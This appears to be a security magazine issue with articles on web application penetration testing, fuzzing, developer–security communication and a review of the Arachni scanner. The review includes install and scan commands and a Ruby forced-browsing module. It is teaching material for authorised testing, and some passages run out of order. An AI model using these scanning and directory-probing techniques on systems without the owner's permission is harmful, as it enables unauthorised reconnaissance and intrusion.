The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions, and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s), and any intermediary devices such as firewalls and load balancers. It's also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities: manual inspection of items such as HTTP responses, hidden fields, and HTML page sources should be part of the security assessment as well.
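As a sketch of that manual-inspection step, a small helper (hypothetical, built on the standard library's html.parser) can list the hidden fields a page relies on, so the tester can review which values the application wrongly assumes the client will never change:

```python
# Pull hidden form fields out of an HTML page for manual review/tampering tests.
from html.parser import HTMLParser

class HiddenFieldExtractor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.hidden[a.get("name")] = a.get("value")

page = '''<form action="/checkout">
  <input type="hidden" name="price" value="19.99">
  <input type="text" name="qty" value="1">
</form>'''

parser = HiddenFieldExtractor()
parser.feed(page)
print(parser.hidden)  # {'price': '19.99'} -- 'price' is a tampering candidate
```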
Some of the areas that can be covered during the vulnerability assessment are the following:
• Input validation
• Access Control
Figure 3 Testing techniques procedures and steps
• Authentication and Session Management (Session ID flaws) Vulnerabilities
• Cross Site Scripting (XSS) Vulnerabilities
• Buffer Overflows
• Injection Flaws
• Error Handling
• Insecure Storage
• Denial of Service (if required)
• Configuration Management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause Denial of Service conditions; these are usually discussed beforehand. Possible options for Denial of Service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations, and comments are summarized, and better solutions are suggested for the implementation process. At this point the penetration test is half-way done, and the most important part of the assessment has yet to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing:
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. Port scanning tools examine each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. The configuration flexibility of port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
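The core idea can be sketched in a few lines of Python (illustrative only; real scanners such as nmap add UDP support, stealth techniques, and OS fingerprinting on top of this):

```python
# Minimal TCP connect scanner: attempt a connection to each port and record
# which ones accept it.
import socket

def scan_ports(host, ports, timeout=0.5):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports

# Example: probe a few common web ports on the local machine.
print(scan_ports("127.0.0.1", [80, 443, 8080]))
```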
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard, and Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxy
Assessment proxies work by interposing themselves between the web browser used by the tester and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and its associated components. For example, penetration testers can view all cookies, hidden HTML fields, and other data used by the web application and attempt to manipulate their values to trick the application.
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform these practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used as a feedback and reporting feature for the test results.
• Extensibility – The tool should be customizable and must provide a scripting language or plug-in
capabilities that can be used to construct customized penetration tests.
• Configurability – A tool that is configurable is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide proper documentation with a clear explanation of the probes performed during the penetration testing.
• License Flexibility – A tool that can be used without specific constraints, such as a particular range of IP addresses or license limits, is a better tool than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting, and other attacks against the web application.
• Validate data before form submission and manage sessions – Cross-Site Request Forgery (CSRF) can occur when a web application accepts form submission data without verifying that it came from the user's own web form. It is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and apply proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to protect stored passwords.
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying, and ranking the vulnerabilities in a system; this process determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes the entire vulnerability assessment process plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
Automated web application security tools have matured in recent years, and over time automated security assessments will continue to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negatives).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools can't entirely replace manual penetration tests. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, in particular for the logical vulnerabilities that automated testing misses.
Finally, it is important to point out that over time manual testing for technical vulnerabilities will go from difficult to impossible as web applications grow in size, scope, and complexity. The fact that many enterprise organizations will not be able to dedicate the time, money, and effort required to assess thousands of web applications will increase the use of automated tools rather than manual testing by humans. Relying on human effort alone to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
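A toy illustration of the idea (a hypothetical fragile_parser stands in for the real test target; this is a sketch of random mutation fuzzing, not a production fuzzer):

```python
# Flip random bytes in a valid input and watch for crashes.
import random

def fragile_parser(data: bytes):
    # Contrived bug: a declared length field is trusted, and only ASCII
    # payloads are handled; anomalous bytes raise an exception.
    length = data[0]
    return data[1:1 + length].decode("ascii")

def fuzz(target, seed_input, rounds=200):
    random.seed(0)  # reproducible run
    crashes = []
    for _ in range(rounds):
        mutated = bytearray(seed_input)
        mutated[random.randrange(len(mutated))] = random.randrange(256)
        try:
            target(bytes(mutated))
        except Exception as exc:
            crashes.append((bytes(mutated), repr(exc)))
    return crashes

found = fuzz(fragile_parser, b"\x05hello")
print(f"{len(found)} crashing inputs found")
```

Each crashing input is kept alongside the exception it triggered, which is exactly the documentation/reproduction material the sidebar argues a good fuzzer must produce automatically.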
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases
When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation
All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers, so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts
Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box
If the requirement for testers is simply to do fuzzing, they almost always choose the quick and dirty solution: random fuzzing. Test requirements should instead focus on coverage metrics, to ensure that testing aims to find most flaws in the software.
Using hardware test beds
Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you where testing is needed, and are not locked to a physical test lab.
Unprepared for cloud
A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud environments.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites
Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use
Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated
Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage
Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable
Time is almost always an issue when it comes to testing, so the user must have control over fuzzing parameters such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can spend more time on testing and can select other test completion criteria.
Application Security members are considered like the tax man asking for money: security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign on the new product line. Marketers might ask the developers for something like Give us the latest Web 2.0, social-enabled website to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more to meet the proposed deadline. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and in project Gantt charts there usually
are no security checkpoints included for code testing, nor any time allowed for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom, for example statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before use. The report does not contain all
Developers are from Venus, Application Security guys are from Mars
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy. There is a third approach I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: as part of the WAPT activity, instead of an implement a filtering policy statement, you produce a set of rspec/cucumber scenarios modeling how the source code must deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases, and when testing is complete and all tests pass, it means your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed input and why it is so important to the Application Security group.
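The same test-first idea can be sketched in Python (the article's examples use rspec and cucumber from the Ruby world; sanitize() below is a hypothetical function under remediation): each scenario models how the code must behave when fed malformed input, and development continues until every scenario passes.

```python
import html

def sanitize(value):
    """The remediation the developers implement: an output-encoding filter."""
    return html.escape(value)

# Scenarios written *before* the fix, modeling the expected behaviour:
def scenario_script_tags_are_neutralized():
    assert "<script>" not in sanitize("<script>alert(1)</script>")

def scenario_benign_input_is_preserved():
    assert sanitize("hello world") == "hello world"

# While sanitize() is unimplemented the scenarios fail; once they all pass,
# the "implement a filtering policy" remediation is demonstrably in place.
scenario_script_tags_are_neutralized()
scenario_benign_input_is_preserved()
print("all filtering scenarios pass")
```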
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process using a language with no common ground, which further confuses or annoys everyone and pushes the groups further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which developers can pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. Developers want to know in which module, class, or line the problem exists, so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production on schedule.
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved in two ways:
• Create a development framework that has security built into it
• Design an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection, and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works with a programming language that contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra have some security facilities as well). In the Java programming language community, there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar, and practicing Taekwon-Do ITF martial art. He's a husband, a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools possible for the job at hand. Is Arachni worthwhile?
Time for an in-depth review
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward from a user's or component developer's point of view.
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of Arachni
Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules: SQL injection; Blind SQL injection using rDiff analysis; Blind SQL injection using timing attacks; CSRF detection; Code injection (PHP, Ruby, Python, JSP, ASP.NET); Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET); LDAP injection; Path traversal; Response splitting; OS command injection (*nix, Windows); Blind OS command injection using timing attacks (*nix, Windows); Remote file inclusion; Unvalidated redirects; XPath injection; Path XSS; URI XSS; XSS; XSS in event attributes of HTML elements; XSS in HTML tags; XSS in HTML script tags

Recon Modules: Allowed HTTP methods; Back-up files; Common directories; Common files; HTTP PUT; Insufficient Transport Layer Protection for password forms; WebDAV detection; HTTP TRACE detection; Credit card number disclosure; CVS/SVN user disclosure; Private IP address disclosure; Common backdoors; .htaccess LIMIT misconfiguration; Interesting responses; HTML object grepper; E-mail address disclosure; US Social Security Number disclosure; Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).

This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architectural and a source-code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured with SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies and headers. It gracefully handles badly written HTML thanks to a combination of regular-expression analysis and the Nokogiri HTML parser.
Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.
Plug-ins:
• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form-based AutoLogin: performs an automated login
• Dictionary attacker: performs dictionary attacks against HTTP authentication and form-based authentication
• Profiler: performs taint analysis with benign inputs and response-time analysis
• Cookie collector: keeps track of cookies while establishing a timeline of the changes
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  • TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4) so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually means recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:

$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:

$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:

$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:

$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands in Listing 2 in the Cygwin shell (note: these are the same commands as for the Linux installation).
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:

$ find /usr/local -iname '*.so' > /tmp/localso.lst

Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line.
The GUI can be started by executing the following commands
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.
Figure 1. Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of what issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, ...
• Settings: the settings screens allow you to add cookies and headers, limit the scan to certain directories, ...
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com

The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information is disclosed.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.

Move into your Arachni source tree and you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory; we will create our Ruby module there.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needs to be protected and you forgot to protect it, it will be found by a scanner that uses these wordlists.
